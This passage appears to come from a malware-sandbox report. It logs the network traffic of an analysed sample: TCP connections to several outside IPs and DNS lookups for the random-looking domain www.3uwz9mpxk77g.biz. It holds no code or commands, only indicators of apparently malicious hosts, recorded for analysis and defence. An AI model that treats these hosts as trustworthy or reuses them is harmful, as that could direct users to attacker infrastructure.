                                                                                                                                                    Nov 29, 2021 14:11:06.636776924 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636782885 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636817932 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.636904955 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.636990070 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637052059 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637150049 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637203932 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637273073 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637345076 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637413025 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637428999 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637564898 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637701035 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.637810946 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.637921095 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.638077021 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.638256073 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.638292074 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.707664967 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.707788944 CET804984466.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.707974911 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.707989931 CET4984480192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806004047 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806065083 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806219101 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806305885 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806333065 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806350946 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806499004 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806575060 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806627035 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806742907 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.806747913 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806936026 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.806986094 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807060957 CET4984380192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:11:06.807099104 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:06.807209015 CET804984366.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.537064075 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.537091970 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:15.537203074 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.541434050 CET49845443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:11:15.541476011 CET4434984520.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:16.758913994 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.893157005 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:16.893497944 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.894920111 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.895016909 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:16.895191908 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.037909031 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.038265944 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.038408995 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.041656971 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.041728973 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.041996002 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.042098045 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.042115927 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180084944 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180149078 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180191994 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180319071 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180354118 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180480957 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180556059 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.180682898 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180744886 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180788040 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.180915117 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.181092024 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.181330919 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.181499004 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.251446009 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.251508951 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.251545906 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.251768112 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.251816988 CET4984780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.321858883 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.321930885 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.321974039 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322005033 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322036028 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322066069 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322063923 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.322098017 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.322166920 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.322223902 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.322395086 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.331252098 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.331502914 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.331631899 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.397542953 CET8049847216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454088926 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454149008 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454231024 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454267979 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454329014 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454366922 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454405069 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454464912 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454500914 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454539061 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454591990 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.454627991 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463531017 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463596106 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463654041 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463690996 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463756084 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463793993 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.463891983 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.467701912 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.467839956 CET8049846216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:17.467864037 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:17.467947006 CET4984680192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:11:22.257766008 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.272573948 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.272794962 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.274576902 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.274683952 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.274826050 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289438963 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289494038 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289527893 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289649010 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289707899 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289731026 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289789915 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289844990 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289896965 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.289930105 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.289972067 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.290062904 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.290071011 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.290071964 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.290179014 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.304465055 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304512978 CET804984888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304661036 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.304713011 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304734945 CET4984880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.304858923 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.304896116 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:22.305176020 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.305212975 CET4984980192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:11:22.319791079 CET804984988.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.319458961 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.477432966 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.477590084 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.479099035 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.479124069 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.479371071 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.637892962 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.638046026 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.638103008 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.638290882 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.640254974 CET8049851172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.640393972 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.640578032 CET4985180192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.798952103 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799045086 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799067974 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799087048 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799105883 CET8049850172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:27.799201012 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.799252987 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:27.799299955 CET4985080192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:11:47.258126974 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258167982 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258236885 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258249044 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258270025 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258306980 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258466005 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258510113 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.258651972 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258770943 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.258970022 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.268356085 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.268563986 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269016981 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269188881 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269252062 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269433022 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269501925 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269567966 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269757032 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269783020 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.269845963 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.269959927 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270042896 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270078897 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270111084 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270132065 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270183086 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270241022 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270311117 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270327091 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270365953 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270425081 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270456076 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270486116 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270495892 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270545006 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270576954 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270659924 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270704031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270843029 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.270863056 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270899057 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.270931005 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.271013975 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.271192074 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.271398067 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.279687881 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.279853106 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.280405045 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.280644894 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.280647993 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.280889034 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.280946016 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281172037 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281549931 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.281709909 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.281796932 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.281821966 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281943083 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.281955957 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282150030 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282186031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282224894 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282303095 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282336950 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282354116 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282413006 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282474041 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282572031 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282655954 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282825947 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.282852888 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282907009 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282939911 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.282970905 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283091068 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283128023 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283191919 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283237934 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.283330917 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283471107 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283624887 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283663988 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.283694983 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.290972948 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.291755915 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.292016983 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.294673920 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.300093889 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.354579926 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.354654074 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.354926109 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.354983091 CET4985580192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.366092920 CET804985534.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.404886007 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.404977083 CET804985434.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:11:47.405059099 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:11:47.405143976 CET4985480192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:12:09.702656031 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.711189032 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.711421013 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.711518049 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.720061064 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.865227938 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.865293980 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:09.865544081 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.865611076 CET4985680192.168.11.20192.0.78.25
                                                                                                                                                    Nov 29, 2021 14:12:09.874506950 CET8049856192.0.78.25192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:14.900017977 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.069439888 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.069787025 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.069869041 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.239377975 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.239454985 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.239505053 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:15.239835978 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.239902973 CET4985780192.168.11.2038.143.25.232
                                                                                                                                                    Nov 29, 2021 14:12:15.409240007 CET804985738.143.25.232192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.438467026 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.466788054 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.466950893 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.467041016 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.495929003 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.495979071 CET8049859185.61.153.97192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:12:30.496229887 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.496279001 CET4985980192.168.11.20185.61.153.97
                                                                                                                                                    Nov 29, 2021 14:12:30.524744034 CET8049859185.61.153.97192.168.11.20

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                                                                                                    Nov 29, 2021 14:10:06.737622023 CET192.168.11.209.9.9.90xaeeStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:10.742304087 CET192.168.11.201.1.1.10xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:10.960792065 CET192.168.11.209.9.9.90xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
